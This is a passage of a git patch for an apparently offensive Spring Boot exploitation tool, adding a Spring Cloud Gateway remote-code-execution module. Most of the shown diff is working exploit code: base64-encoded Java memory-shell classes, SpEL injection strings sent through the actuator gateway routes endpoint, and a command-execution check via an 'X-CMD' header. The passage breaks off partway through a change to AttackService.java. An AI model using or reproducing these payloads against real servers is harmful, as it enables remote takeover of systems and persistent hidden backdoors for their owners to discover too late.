From e9dcb1b3e4ea55f753e2a6b4e0078bb01a3ae8cf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A4=8F=E5=A4=A9?= Date: 2022年4月17日 21:26:15 +0800 Subject: [PATCH 1/8] =?UTF-8?q?=E6=9B=B4=E6=96=B01.3=E7=89=88=E6=9C=AC?= =?UTF-8?q?=EF=BC=8C=E6=94=AF=E6=8C=81SpringCloudGatewayRCE?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .github/workflows/maven.yml | 61 +++++++ pom.xml | 2 +- .../drops/exp/SpringCloudGatewayRCEEXP.java | 65 +++++++ .../java/com/drops/main/AttackService.java | 15 +- .../com/drops/poc/SpringBootInfoCheck.java | 9 +- .../drops/poc/SpringCloudGatewayRCEPOC.java | 63 +++++++ .../java/com/drops/ui/MainController.java | 18 +- src/main/java/com/drops/utils/HTTPUtils.java | 15 ++ .../java/com/drops/utils/StringRandom.java | 30 ++++ src/test/java/0cat.class | Bin 0 -> 9364 bytes src/test/java/Client.java | 32 ++++ src/test/java/LdapClient.java | 170 ++++++++++++++++++ src/test/java/gateway.java | 37 ++++ src/test/java/spel.java | 31 ++++ 14 files changed, 537 insertions(+), 11 deletions(-) create mode 100644 .github/workflows/maven.yml create mode 100644 src/main/java/com/drops/exp/SpringCloudGatewayRCEEXP.java create mode 100644 src/main/java/com/drops/poc/SpringCloudGatewayRCEPOC.java create mode 100644 src/main/java/com/drops/utils/StringRandom.java create mode 100644 src/test/java/0cat.class create mode 100644 src/test/java/Client.java create mode 100644 src/test/java/LdapClient.java create mode 100644 src/test/java/gateway.java create mode 100644 src/test/java/spel.java diff --git a/.github/workflows/maven.yml b/.github/workflows/maven.yml new file mode 100644 index 0000000..c0438c9 --- /dev/null +++ b/.github/workflows/maven.yml @@ -0,0 +1,61 @@ +name: Release Maven + + + +on: + push: + tags: + - '*' +#on: [push] + + + +jobs: + build: + runs-on: ubuntu-latest + + steps: + - uses: actions/checkout@v2 + - name: Set up JDK 1.8 + uses: actions/setup-java@v1 + with: + distribution: "Liberica" + java-version: 1.8 + java-package: jdk+fx + - name: Build with Maven + run: + mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V + - name: Create Release + id: create_release + uses: SummerSec/create-release@master + with: + tag_name: ${{ github.ref }} + release-name: Release ${{ github.ref }} + draft: false + prerelease: false + env: + GITHUB_TOKEN: ${{ secrets.RELEASE }} + + + - name: Upload a Build Artifact + id: upload-build-artifact + uses: actions/upload-artifact@v2.3.1 + with: + # Artifact name + name: # optional, default is artifact + SPATool-${{steps.create_release.outputs.tag}}-SNAPSHOT-all.jar + # A file, directory or wildcard pattern that describes what to upload + path: + target/*-SNAPSHOT-all.jar + # The desired behavior if no files are found using the provided path. + + - name: Auto Upload Release + id: upload-release-asset + uses: actions/upload-release-asset@v1.0.1 + env: + GITHUB_TOKEN: ${{secrets.RELEASE}} + with: + upload_url: ${{ steps.create_release.outputs.upload_url }} + asset_path: /home/runner/work/SPATool/SPATool/target/SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar + asset_name: SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar + asset_content_type: application/java-archive diff --git a/pom.xml b/pom.xml index cd3a18b..9d6fb69 100644 --- a/pom.xml +++ b/pom.xml @@ -7,7 +7,7 @@ org.example SpringBootExploit - 1.2-SNAPSHOT + 1.3-SNAPSHOT diff --git a/src/main/java/com/drops/exp/SpringCloudGatewayRCEEXP.java b/src/main/java/com/drops/exp/SpringCloudGatewayRCEEXP.java new file mode 100644 index 0000000..622d60e --- /dev/null +++ b/src/main/java/com/drops/exp/SpringCloudGatewayRCEEXP.java @@ -0,0 +1,65 @@ +package com.drops.exp; + +import com.drops.utils.HTTPUtils; +import com.drops.utils.StringRandom; + +/** + * @ClassName: SpringCloudGatewayRCEEXP + * @Description: TODO + * @Author: Summer + * @Date: 2022年4月17日 19:56 + * @Version: v1.0.0 + * @Description: 参考 https://gv7.me/articles/2022/the-spring-cloud-gateway-inject-memshell-through-spel-expressions/ + **/ +public class SpringCloudGatewayRCEEXP { + final static String mem = "yv66vgAAADQBFAoAPgB9CAB+BwB/CABTBwCACgAFAIEKAIIAgwcAhAoAggCFCgCGAIcKAIYAiAoACACJCgAFAIoIAIsKAIwAjQgASwoABQCOCgCPAIMKAI8AkAoABQCRCABOCACSBwCTCgAXAH0KAI8AlAgAlQcAlggAlwsAmACZCACaCACbCwCcAJ0HAJ4LACEAnwgAoAoAoQCiCgChAKMHAKQKAKUApgoApQCnCgCoAKkKACYAqggAqwoAJgCsCgAmAK0JAK4ArwoAFwCwCgAbALELALIAswcAtAkAtQC2CQC3ALgKALkAugoAMgC7CwC8AJ8JAL0AvggAvwoAoQDACwCyAMEJAMIAwwsAxADFBwDGBwDHAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAA9MTmV0dHlNZW1zaGVsbDsBAAhkb0luamVjdAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAVX3ZhbCRkaXNwb3NhYmxlU2VydmVyAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAFHZhbCRkaXNwb3NhYmxlU2VydmVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAHX2NvbmZpZwEABmNvbmZpZwEAEF9kb09uQ2hhbm5lbEluaXQBAAZ0aHJlYWQBAAFpAQABSQEACmdldFRocmVhZHMBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAB3RocmVhZHMBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQADbXNnAQASTGphdmEvbGFuZy9TdHJpbmc7AQANU3RhY2tNYXBUYWJsZQcAyAcAyQcAhAcAlgEADW9uQ2hhbm5lbEluaXQBAFcoTHJlYWN0b3IvbmV0dHkvQ29ubmVjdGlvbk9ic2VydmVyO0xpby9uZXR0eS9jaGFubmVsL0NoYW5uZWw7TGphdmEvbmV0L1NvY2tldEFkZHJlc3M7KVYBABJjb25uZWN0aW9uT2JzZXJ2ZXIBACJMcmVhY3Rvci9uZXR0eS9Db25uZWN0aW9uT2JzZXJ2ZXI7AQAHY2hhbm5lbAEAGkxpby9uZXR0eS9jaGFubmVsL0NoYW5uZWw7AQANc29ja2V0QWRkcmVzcwEAGExqYXZhL25ldC9Tb2NrZXRBZGRyZXNzOwEACHBpcGVsaW5lAQAiTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbFBpcGVsaW5lOwEAEE1ldGhvZFBhcmFtZXRlcnMBAAtjaGFubmVsUmVhZAEAPShMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7TGphdmEvbGFuZy9PYmplY3Q7KVYBAANjbWQBAApleGVjUmVzdWx0AQALaHR0cFJlcXVlc3QBAClMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBSZXF1ZXN0OwEAA2N0eAEAKExpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxIYW5kbGVyQ29udGV4dDsHAJ4BAApFeGNlcHRpb25zAQAEc2VuZAEAbShMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7TGphdmEvbGFuZy9TdHJpbmc7TGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXM7KVYBAAdjb250ZXh0AQAGc3RhdHVzAQAwTGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXM7AQAIcmVzcG9uc2UBAC5MaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0Z1bGxIdHRwUmVzcG9uc2U7AQAKU291cmNlRmlsZQEAEk5ldHR5TWVtc2hlbGwuamF2YQwAQABBAQAMaW5qZWN0LXN0YXJ0AQAQamF2YS9sYW5nL1RocmVhZAEAD2phdmEvbGFuZy9DbGFzcwwAygDLBwDJDADMAM0BABBqYXZhL2xhbmcvT2JqZWN0DADOAM8HANAMANEA0gwA0wDUDADVANYMANcASAEADk5ldHR5V2ViU2VydmVyBwDIDADYANkMANoA2wcA3AwA0wDdDADeANYBAA9kb09uQ2hhbm5lbEluaXQBAA1OZXR0eU1lbXNoZWxsDADfAOABAA5pbmplY3Qtc3VjY2VzcwEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAxpbmplY3QtZXJyb3IHAOEMAGcA4gEAH3JlYWN0b3IubGVmdC5odHRwVHJhZmZpY0hhbmRsZXIBABBtZW1zaGVsbF9oYW5kbGVyBwDjDADkAOUBACdpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cFJlcXVlc3QMAOYA5wEABVgtQ01EBwDoDADYAOkMANMA6gEAEWphdmEvdXRpbC9TY2FubmVyBwDrDADsAO0MAO4A7wcA8AwA8QDyDABAAPMBAAJcQQwA9AD1DAD2AEgHAPcMAPgAeAwAdAB1DAD5AEEHAPoMAPsA/AEAM2lvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9EZWZhdWx0RnVsbEh0dHBSZXNwb25zZQcA/QwA/gD/BwEADAEBAQIHAQMMAQQBBQwAQAEGBwEHBwEIDAEJAQoBABl0ZXh0L3BsYWluOyBjaGFyc2V0PVVURi04DADfAQsMAQwBDQcBDgwBDwEQBwERDAESARMBACVpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxEdXBsZXhIYW5kbGVyAQAncmVhY3Rvci9uZXR0eS9DaGFubmVsUGlwZWxpbmVDb25maWd1cmVyAQAQamF2YS9sYW5nL1N0cmluZwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAXamF2YS9sYW5nL3JlZmxlY3QvQXJyYXkBAAlnZXRMZW5ndGgBABUoTGphdmEvbGFuZy9PYmplY3Q7KUkBAANnZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7SSlMamF2YS9sYW5nL09iamVjdDsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAdnZXROYW1lAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEADWdldFN1cGVyY2xhc3MBAANzZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYBABhpby9uZXR0eS9jaGFubmVsL0NoYW5uZWwBACQoKUxpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxQaXBlbGluZTsBACBpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxQaXBlbGluZQEACWFkZEJlZm9yZQEAaShMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL1N0cmluZztMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlcjspTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbFBpcGVsaW5lOwEAB2hlYWRlcnMBACsoKUxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cEhlYWRlcnM7AQAnaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBIZWFkZXJzAQAVKExqYXZhL2xhbmcvU3RyaW5nOylaAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEALmlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXMBAAJPSwEAD3ByaW50U3RhY2tUcmFjZQEAJmlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEhhbmRsZXJDb250ZXh0AQAPZmlyZUNoYW5uZWxSZWFkAQA8KExqYXZhL2xhbmcvT2JqZWN0OylMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7AQAnaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBWZXJzaW9uAQAISFRUUF8xXzEBAClMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBWZXJzaW9uOwEAGWlvL25ldHR5L3V0aWwvQ2hhcnNldFV0aWwBAAVVVEZfOAEAGkxqYXZhL25pby9jaGFyc2V0L0NoYXJzZXQ7AQAYaW8vbmV0dHkvYnVmZmVyL1VucG9vbGVkAQAMY29waWVkQnVmZmVyAQBNKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0xqYXZhL25pby9jaGFyc2V0L0NoYXJzZXQ7KUxpby9uZXR0eS9idWZmZXIvQnl0ZUJ1ZjsBAHUoTGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwVmVyc2lvbjtMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBSZXNwb25zZVN0YXR1cztMaW8vbmV0dHkvYnVmZmVyL0J5dGVCdWY7KVYBACxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvRnVsbEh0dHBSZXNwb25zZQEAK2lvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwSGVhZGVyTmFtZXMBAAxDT05URU5UX1RZUEUBABtMaW8vbmV0dHkvdXRpbC9Bc2NpaVN0cmluZzsBAFUoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7TGphdmEvbGFuZy9PYmplY3Q7KUxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cEhlYWRlcnM7AQANd3JpdGVBbmRGbHVzaAEANChMamF2YS9sYW5nL09iamVjdDspTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEZ1dHVyZTsBACZpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxGdXR1cmVMaXN0ZW5lcgEABUNMT1NFAQAoTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEZ1dHVyZUxpc3RlbmVyOwEAHmlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEZ1dHVyZQEAC2FkZExpc3RlbmVyAQBSKExpby9uZXR0eS91dGlsL2NvbmN1cnJlbnQvR2VuZXJpY0Z1dHVyZUxpc3RlbmVyOylMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsRnV0dXJlOwAhABcAPgABAD8AAAAFAAEAQABBAAEAQgAAAC8AAQABAAAABSq3AAGxAAAAAgBDAAAABgABAAAAFgBEAAAADAABAAAABQBFAEYAAAAJAEcASAABAEIAAAHDAAQACgAAALUSAksSAxIEA70ABbYABkwrBLYABysBA70ACLYACU0DPh0suAAKogCHLB24AAs6BBkExgB1GQS2AAy2AA0SDrYAD5kAZRkEtgAMEhC2ABE6BRkFBLYAEhkFGQS2ABM6BhkGtgAMtgAUEhW2ABE6BxkHBLYAEhkHGQa2ABM6CBkItgAMtgAUtgAUEha2ABE6CRkJBLYAEhkJGQi7ABdZtwAYtgAZEhpLhAMBp/93pwAHTBIcSyqwAAEAAwCsAK8AGwADAEMAAABaABYAAAAYAAMAGgAPABsAFAAcAB4AHgAoAB8ALwAgAEQAIQBQACIAVgAjAF8AJABuACUAdAAmAH0AJwCPACgAlQApAKMAKgCmAB4ArAAvAK8ALQCwAC4AswAwAEQAAABwAAsAUABWAEkASgAFAF8ARwBLAEwABgBuADgATQBKAAcAfQApAE4ATAAIAI8AFwBPAEoACQAvAHcAUABMAAQAIACMAFEAUgADAA8AnQBTAFQAAQAeAI4AVQBMAAIAsAADAFYAVwABAAMAsgBYAFkAAABaAAAAHgAF/wAgAAQHAFsHAFwHAF0BAAD7AIX4AAVCBwBeAwABAF8AYAACAEIAAAB2AAUABQAAABwsuQAdAQA6BBkEEh4SH7sAF1m3ABi5ACAEAFexAAAAAgBDAAAADgADAAAANgAIADgAGwA5AEQAAAA0AAUAAAAcAEUARgAAAAAAHABhAGIAAQAAABwAYwBkAAIAAAAcAGUAZgADAAgAFABnAGgABABpAAAADQMAYQAAAGMAAABlAAAAAQBqAGsAAwBCAAABEAAEAAYAAABhLMEAIZkAVCzAACFOLbkAIgEAEiO2ACSZADctuQAiAQASI7YAJToEuwAmWbgAJxkEtgAotgAptwAqEiu2ACy2AC06BSorGQWyAC63AC+xpwAKOgQZBLYAMCssuQAxAgBXsQABAAwATQBRABsAAwBDAAAAMgAMAAAAPwAHAEAADABCABoAQwAnAEQAQwBGAE0ARwBOAEsAUQBJAFMASgBYAE0AYABOAEQAAABIAAcAJwAnAGwAWQAEAEMACwBtAFkABQBTAAUAVgBXAAQADABMAG4AbwADAAAAYQBFAEYAAAAAAGEAcABxAAEAAABhAFgATAACAFoAAAAPAAP8AE4HAHJCBwBe+gAGAHMAAAAEAAEAGwBpAAAACQIAcAAAAFgAAAACAHQAdQACAEIAAACUAAYABQAAADa7ADJZsgAzLSyyADS4ADW3ADY6BBkEuQA3AQCyADgSObYAOlcrGQS5ADsCALIAPLkAPQIAV7EAAAACAEMAAAASAAQAAABSABQAUwAkAFQANQBVAEQAAAA0AAUAAAA2AEUARgAAAAAANgBwAHEAAQAAADYAdgBZAAIAAAA2AHcAeAADABQAIgB5AHoABABpAAAADQMAcAAAAHYAAAB3AAAAAQB7AAAAAgB8"; + + + final static String mem1 = "yv66vgAAADQAjgoABgBLCABMCgAGAE0IADAHAE4HAE8HAFAHAFEKAAUAUgoABwBTBwBUCAAyBwBVBwBWCgAOAEsIAFcKAA4AWAcAWQcAWgoAEgBbCABcCgAIAF0KAAsASwoABwBeCABfBwBgCABhBwBiCgBjAGQKAGMAZQoAZgBnCgAcAGgIAGkKABwAagoAHABrBwBsCQBtAG4KACQAbwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAeTFNwcmluZ1JlcXVlc3RNYXBwaW5nTWVtc2hlbGw7AQAIZG9JbmplY3QBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvU3RyaW5nOwEAFXJlZ2lzdGVySGFuZGxlck1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAOZXhlY3V0ZUNvbW1hbmQBAAtwYXRoUGF0dGVybgEAMkxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi91dGlsL3BhdHRlcm4vUGF0aFBhdHRlcm47AQAYcGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uAQBMTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9jb25kaXRpb24vUGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uOwEAEnJlcXVlc3RNYXBwaW5nSW5mbwEAQ0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAccmVxdWVzdE1hcHBpbmdIYW5kbGVyTWFwcGluZwEAEkxqYXZhL2xhbmcvT2JqZWN0OwEAA21zZwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEADVN0YWNrTWFwVGFibGUHAE8HAFUHAGABABBNZXRob2RQYXJhbWV0ZXJzAQA9KExqYXZhL2xhbmcvU3RyaW5nOylMb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL1Jlc3BvbnNlRW50aXR5OwEAA2NtZAEACmV4ZWNSZXN1bHQBAApFeGNlcHRpb25zBwBwAQAKU291cmNlRmlsZQEAIVNwcmluZ1JlcXVlc3RNYXBwaW5nTWVtc2hlbGwuamF2YQwAJwAoAQAMaW5qZWN0LXN0YXJ0DABxAHIBAA9qYXZhL2xhbmcvQ2xhc3MBABBqYXZhL2xhbmcvT2JqZWN0AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQBBb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm8MAHMAdAwAdQB2AQAcU3ByaW5nUmVxdWVzdE1hcHBpbmdNZW1zaGVsbAEAEGphdmEvbGFuZy9TdHJpbmcBADZvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi91dGlsL3BhdHRlcm4vUGF0aFBhdHRlcm5QYXJzZXIBAAIvKgwAdwB4AQBKb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L2NvbmRpdGlvbi9QYXR0ZXJuc1JlcXVlc3RDb25kaXRpb24BADBvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi91dGlsL3BhdHRlcm4vUGF0aFBhdHRlcm4MACcAeQEAAAwAJwB6DAB7AHwBAA5pbmplY3Qtc3VjY2VzcwEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAxpbmplY3QtZXJyb3IBABFqYXZhL3V0aWwvU2Nhbm5lcgcAfQwAfgB/DACAAIEHAIIMAIMAhAwAJwCFAQACXEEMAIYAhwwAiACJAQAnb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL1Jlc3BvbnNlRW50aXR5BwCKDACLAIwMACcAjQEAE2phdmEvaW8vSU9FeGNlcHRpb24BAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEABXBhcnNlAQBGKExqYXZhL2xhbmcvU3RyaW5nOylMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvdXRpbC9wYXR0ZXJuL1BhdGhQYXR0ZXJuOwEANihbTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3V0aWwvcGF0dGVybi9QYXRoUGF0dGVybjspVgECJChMamF2YS9sYW5nL1N0cmluZztMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L2NvbmRpdGlvbi9QYXR0ZXJuc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9jb25kaXRpb24vUmVxdWVzdE1ldGhvZHNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvY29uZGl0aW9uL1BhcmFtc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9jb25kaXRpb24vSGVhZGVyc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9jb25kaXRpb24vQ29uc3VtZXNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvY29uZGl0aW9uL1Byb2R1Y2VzUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L2NvbmRpdGlvbi9SZXF1ZXN0Q29uZGl0aW9uOylWAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEABG5leHQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAI29yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9IdHRwU3RhdHVzAQACT0sBACVMb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL0h0dHBTdGF0dXM7AQA6KExqYXZhL2xhbmcvT2JqZWN0O0xvcmcvc3ByaW5nZnJhbWV3b3JrL2h0dHAvSHR0cFN0YXR1czspVgAhAAsABgAAAAAAAwABACcAKAABACkAAAAvAAEAAQAAAAUqtwABsQAAAAIAKgAAAAYAAQAAABQAKwAAAAwAAQAAAAUALAAtAAAACQAuAC8AAgApAAABUwAKAAcAAACSEgJMKrYAAxIEBr0ABVkDEgZTWQQSB1NZBRIIU7YACU0sBLYAChILEgwEvQAFWQMSDVO2AAlOuwAOWbcADxIQtgAROgS7ABJZBL0AE1kDGQRTtwAUOgW7AAhZEhUZBQEBAQEBAbcAFjoGLCoGvQAGWQO7AAtZtwAXU1kELVNZBRkGU7YAGFcSGUynAAdNEhtMK7AAAQADAIkAjAAaAAMAKgAAADYADQAAABYAAwAYACAAGQAlABoANgAbAEQAHABWAB0AaQAeAIYAHwCJACIAjAAgAI0AIQCQACMAKwAAAFIACAAgAGkAMAAxAAIANgBTADIAMQADAEQARQAzADQABABWADMANQA2AAUAaQAgADcAOAAGAI0AAwA5ADoAAgAAAJIAOwA8AAAAAwCPAD0APgABAD8AAAATAAL/AIwAAgcAQAcAQQABBwBCAwBDAAAABQEAOwAAAAEAMgBEAAMAKQAAAGgABAADAAAAJrsAHFm4AB0rtgAetgAftwAgEiG2ACK2ACNNuwAkWSyyACW3ACawAAAAAgAqAAAACgACAAAAJwAaACgAKwAAACAAAwAAACYALAAtAAAAAAAmAEUAPgABABoADABGAD4AAgBHAAAABAABAEgAQwAAAAUBAEUAAAABAEkAAAACAEo="; + + final static String NettyMemshell = String.format("#{T(org.springframework.cglib.core.ReflectUtils).defineClass('NettyMemshell',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}", mem); + + final static String SpringRequestMappingMemshell = String.format("#{T(org.springframework.cglib.core.ReflectUtils).defineClass('SpringRequestMappingMemshell',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping)}",mem1); + + + public boolean execute(String target, String type){ + String endpoint = "s" + StringRandom.getRandomString(5); + String body = String.format("{\n" + + " \"id\": \"%s\",\n" + + " \"filters\": [{\n" + + " \"name\": \"AddResponseHeader\",\n" + + " \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n" + + " }],\n" + + " \"uri\": \"%s\",\n" + + " \"order\": 0\n" + + "}", endpoint, type, target); + + HTTPUtils.postRequestjson(target , "actuator/gateway/routes/" + endpoint, body).toString(); + HTTPUtils.postRequestV1(target , "actuator/gateway/refresh").toString(); + HTTPUtils.getRequest(target , "actuator/gateway/routes/" + endpoint).toString(); + HTTPUtils.deleteRequest(target , "actuator/gateway/routes/" + endpoint).toString(); + HTTPUtils.postRequestV1(target , "actuator/gateway/refresh").toString(); + String header = "X-CMD: echo "+ endpoint; + + String re6 = HTTPUtils.postRequestV1(target, "?cmd=echo "+ endpoint, header).toString(); +// System.out.println("re6 = " + re6); + if (re6.toLowerCase().contains(endpoint)){ +// System.out.println(String.format("[+] %s inject success", type)); + return true; + } + return false; + } + + public boolean exp(String target){ + + if (execute(target,NettyMemshell)){ + System.out.println("[+] NettyMemshell inject success"); + return true; + }else if (execute(target,SpringRequestMappingMemshell)){ + System.out.println("[+] SpringRequestMappingMemshell inject success"); + return true; + } + return false; + } + +} diff --git a/src/main/java/com/drops/main/AttackService.java b/src/main/java/com/drops/main/AttackService.java index acc9b12..360ecfe 100644 --- a/src/main/java/com/drops/main/AttackService.java +++ b/src/main/java/com/drops/main/AttackService.java @@ -96,7 +96,19 @@ public boolean gadgetSend(String target, String vps, String gadget, String[] por } } + if (gadget.equalsIgnoreCase("SpringCloudGatewayRCE")){ + 